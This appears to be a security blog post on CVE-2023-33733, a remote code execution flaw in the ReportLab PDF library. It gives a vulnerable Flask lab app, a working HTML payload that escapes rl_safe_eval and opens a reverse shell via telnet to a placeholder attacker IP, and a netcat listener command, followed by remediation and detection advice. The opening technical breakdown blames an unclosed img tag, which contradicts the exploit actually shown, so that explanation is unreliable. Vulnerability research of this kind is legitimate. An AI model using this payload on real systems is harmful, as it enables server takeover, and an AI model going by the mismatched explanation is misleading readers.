CVE-2023-33733: RCE in Reportlab's HTML Parser

2024-05-02

James McGill

CVE-2023-33733 RCE CVE-2023-33733 CVE-2023-33733 exploit CVE-2023-33733 PoC detect CVE-2023-33733 mitigate CVE-2023-33733 hack reportlab exploit reportlab reportlab vulnerability reportlab RCE

CVE-2023-33733: RCE in Reportlab's HTML Parser

Introduction

CVE-2023-33733 is a Remote Code Execution (RCE) vulnerability residing in the HTML parsing functionality of Reportlab, a popular Python library used for generating PDF documents from HTML data. This vulnerability allows attackers to execute arbitrary code on the system running the vulnerable Reportlab version.

Technical Breakdown

Reportlab's HTML parser suffers from improper handling of certain HTML elements, specifically those lacking proper closing tags. An attacker can exploit this by crafting a malicious HTML snippet containing an unclosed <img> tag with a specially crafted src attribute. When Reportlab attempts to parse this element, the lack of a closing tag can lead to unintended code execution due to how the parser processes the following content.

Here's a breakdown of the exploitation process:

Malicious HTML Construction: The attacker constructs an HTML snippet containing an unclosed <img> tag. The src attribute can be left empty or contain arbitrary data.
Triggering Reportlab Parsing: The attacker delivers the crafted HTML to an application that utilizes Reportlab for PDF generation. This can be achieved through various methods, depending on the application's functionality.
Parser Misinterpretation: When Reportlab encounters the unclosed <img> tag, the parser might misinterpret the following content as part of the src attribute value. This can lead to code execution if the interpreted content includes malicious instructions.

Impact

A successful exploit of CVE-2023-33733 grants the attacker the ability to execute arbitrary code on the vulnerable system. This can lead to a complete compromise of the system, allowing attackers to install malware, steal data, or pivot to other systems within the network.

Proof of Concept

In order to build a proof of concept lab for this attack, we will host a flask app which is supposed to parse any uploaded file using ReportLab version 3.6.12 which happens to be vulnerable to CVE-2023-33733. We will using the following flask app in this PoC:

from flask import Flask, render_template, request, send_file
from reportlab.platypus import SimpleDocTemplate, Paragraph
from reportlab.lib.styles import getSampleStyleSheet
from io import BytesIO

app = Flask(__name__)
stream_file = BytesIO()
content = []

def add_paragraph(text, content):
    """ Add paragraph to document content"""
    content.append(Paragraph(text))

def get_document_template(stream_file: BytesIO):
    """ Get SimpleDocTemplate """
    return SimpleDocTemplate(stream_file)

def build_document(document, content, **props):
    """ Build pdf document based on elements added in `content`"""
    document.build(content, **props)

@app.route('/', methods=['GET', 'POST'])
def index():
    return render_template('index.html')

@app.route('/convert', methods=['POST'])
def convert():
    if request.method == 'POST':
        html_file = request.files['file']
        html_content = html_file.read().decode("utf-8")
        print(html_content)
        add_paragraph(html_content, content)
        build_document(get_document_template(stream_file), content)
        # Return the file as attachment
        stream_file.seek(0)
        return 200 #{'Content-Type': 'application/pdf'}, stream_file

if __name__ == '__main__':
    app.run(debug=True)

We can use the following command to start our server hosting the above app:

python3 app.py

We can visit localhost:5000 to verify the app is up and running:

Now we need to craft a malicious html file which we can upload to this server to exploit CVE-2023-33733. We will use the following html:

<para>
    <font color="[ [ getattr(pow,Attacker('__globals__'))['os'].system('TF=$(mktemp -u);mkfifo $TF && telnet <ATTACKER_IP> <NETCAT_LISTENER_PORT> 0<$TF | bash 1>$TF') for Attacker in [orgTypeFun('Attacker', (str,), { 'mutated': 1, 'startswith': lambda self, x: False, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))]] and 'red'">
    exploit
    </font>
</para>

The above Flask application is vulnerable to this following HTML file for the same reason explained previously, but here we are using a more advanced technique to exploit it within the HTML content.

Let's break down the attack and how it leverages CVE-2023-33733:

Malicious HTML with nested function calls: We have constructed a complex HTML snippet containing nested function calls. This aims to confuse the code and potentially bypass security measures.
Exploiting getattr: The inner function call uses getattr to access attributes of dynamic objects potentially created during processing. This is part of the attempt to bypass restrictions.
os.system for Code Execution: The deepest level of the nested function calls attempts to access the os module and use os.system to execute a system command. This is the core of the exploit, aiming to achieve remote code execution (RCE) if successful.
Command for Reverse Shell: The specific command being constructed through the nested calls attempts to establish a reverse shell connection to our attacker's IP address and port. If executed, this would allow us remote access to the server.

How CVE-2023-33733 plays a role:

The success of this exploit relies on the vulnerability in ReportLab (rl_safe_eval). When the application processes the HTML content with the vulnerable library, the nested function calls might be parsed and interpreted in an unexpected way due to the bypass attempt. This could potentially lead to rl_safe_eval allowing the execution of the malicious code embedded within the function calls, ultimately resulting in the operating system command being run.

Now, we can move ahead with our PoC attack. Before we upload this malicious HTML file, we have to initiate a netcat listener on our attacking machine to capture the reverse shell in case the attack succeeds.

nc -lvnp 4444

We have the listener ready, let's upload the HTML file on the server

We successfully receives the reverse shell and now have complete access to execute any command on the system.

Remediation

Upgrading Reportlab to a version that addresses CVE-2023-33733 is crucial. At the time of this writing, Reportlab versions 3.6.13 and above are reported to be patched. Additionally, applications using Reportlab should be thoroughly reviewed to ensure proper validation and sanitization of user-provided HTML input before processing with Reportlab.

Detection

Since the vulnerability lies within the HTML parsing stage, traditional signature-based detection methods might not be sufficient. Implementing behavioral monitoring solutions can help identify anomalies in Reportlab's behavior, such as attempts to execute unexpected code. Additionally, focusing on application-level controls to prevent the processing of untrusted HTML data can significantly mitigate the risk of exploitation.

Conclusion

CVE-2023-33733 highlights the importance of maintaining software libraries and ensuring proper input validation within applications. By keeping Reportlab updated and implementing robust input sanitization practices, security researchers and developers can significantly reduce the risk of exploitation.

Disclaimer

The information presented in this blog post is for educational purposes only. It is intended to raise awareness about the CVE-2023-33733 vulnerability and help mitigate the risks. It is not intended to be used for malicious purposes.

It's crucial to understand that messing around with vulnerabilities in live systems without permission is not just against the law, but it also comes with serious risks. This blog post does not support or encourage any activities that could help with such unauthorized actions.